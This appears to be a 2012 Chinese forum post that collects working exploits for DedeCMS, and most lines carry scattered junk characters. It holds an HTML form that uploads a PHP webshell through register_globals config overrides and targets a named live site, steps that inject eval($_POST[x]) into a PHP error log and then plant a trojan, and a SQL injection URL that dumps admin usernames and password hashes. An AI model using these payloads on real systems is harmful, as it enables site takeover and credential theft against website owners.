$ B: f8 a E' G! O: l/ a8 K: f---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
, v5 T: L! I0 r7 o0 J. Y# y<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
1 b( m9 `1 ~- f$ f) C+ D<input type='hidden' name='activepath' value='/data/cache/' />
0 u8 f* ?! r5 ?5 p- x<input type='hidden' name='cfg_basedir' value='../../' />
, |* W5 J* v4 O<input type='hidden' name='cfg_imgtype' value='php' />
1 B: H* I1 H) L w<input type='hidden' name='cfg_not_allowall' value='txt' /> C/ C* @& R1 X* D) l
<input type='hidden' name='cfg_softtype' value='php' />
' h# C! I L4 G# D* ^/ A* ]7 @<input type='hidden' name='cfg_mediatype' value='php' />
4 j( ?: k9 {+ o/ h/ W0 z<input type='hidden' name='f' value='form1.enclosure' />: S" u$ ^* Q$ d
<input type='hidden' name='job' value='upload' />" W" U3 u: b' ^7 G- G8 d
<input type='hidden' name='newname' value='fly.php' />1 b( J+ h1 f" O
Select U Shell <input type='file' name='uploadfile' size='25' />
' z+ E. a1 e2 y, b6 [<input type='submit' name='sb1' value='确定' />
2 P3 ~8 i' R) `! j. D! ]) l$ \</form>
0 `2 D) `$ I" L, n) z8 d3 B5 h, t<br />It's just a exp for the bug of Dedecms V55...<br />* [6 \6 F2 t$ w4 j+ b: O% i
Need register_globals = on...<br />
2 F* B. r1 J! e# gFun the game,get a webshell at /data/cache/fly.php...<br /># A. \/ T9 b' ~
</body> t& Y, |. N! |' Q! j" O9 S' {
</html>
6 h6 e8 _: s0 y; o: b
- y) j, F# }' Z
1 J7 c4 E; A1 c5 V! n& N) J- v2 M5 f6 g# S1 E
8 G) K# ] O: o( V1 o8 J1 T5 y N! J; s6 i2 Z
% y& y! N, K$ G6 T* J
$ }# A! f8 _3 q& R2 }
) x( R4 [6 ~$ ~, L. B8 u* M O: ?& m: V- p7 y7 B% S" |: n
& M0 @8 N. I6 Q. n$ R1 A! ?
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
3 t% s# e- u l! W# C' h利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
/ V* V H0 w: }7 `- n8 j3 d/ w4 D4 O- Q1. 访问网址:
" b3 X. a2 T! D' @' {http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
; g" g: B8 ^' a! [# K& Q5 z8 O$ S可看见错误信息& u- c$ F+ o, P; B* l; N# f" A: y
3 a, H$ k6 M0 j/ U* Z# a) s* X
1 ^" P! [$ d9 B$ G# Z2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。$ ]- j6 D- W2 `# q: T$ o5 ^8 i; h
int(3) Error: Illegal double '1024e1024' value found during parsing6 u0 b2 ~) r' T5 g0 n
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
( |. c2 w0 k$ E' {( U4 f3 o6 f8 m9 C) z+ U( h& |8 [9 x: N
0 U9 o; q5 A }4 `0 U
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
% d5 w$ Y1 N/ L3 @
+ B. T# S9 r3 o7 w5 p3 u( O! o3 [3 Z* W; d. S$ J% M
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>+ w1 G8 _7 B: j, H: E* m3 U
% r6 X4 Q0 [5 P
. t& Y' g0 A. Z按确定后的看到第2步骤的信息表示文件木马上传成功.
" \ \: X) E/ @5 O
" s. X; x$ z t Q \* ]2 b! _- a2 Y) }
/ i* l' p4 ?+ }) M1 F
5 ?6 z& H, X1 {' h) A7 r, o) a$ y5 y1 L: E3 q4 b7 }
& b) H' C- h' h6 J0 l# m
/ E# T( @! R6 }6 w- @" ?, M, |% @/ ^7 t/ |7 C
8 E1 U" H1 d1 b7 @2 e
; q1 B1 ?) s) S1 j7 c
: i( D3 |, }" h8 o6 B8 f& Z# U
7 D. O; y$ H- W4 I* }0 R- U5 }织梦(DedeCms)plus/infosearch.php 文件注入漏洞
# b0 f/ g: k4 | xhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对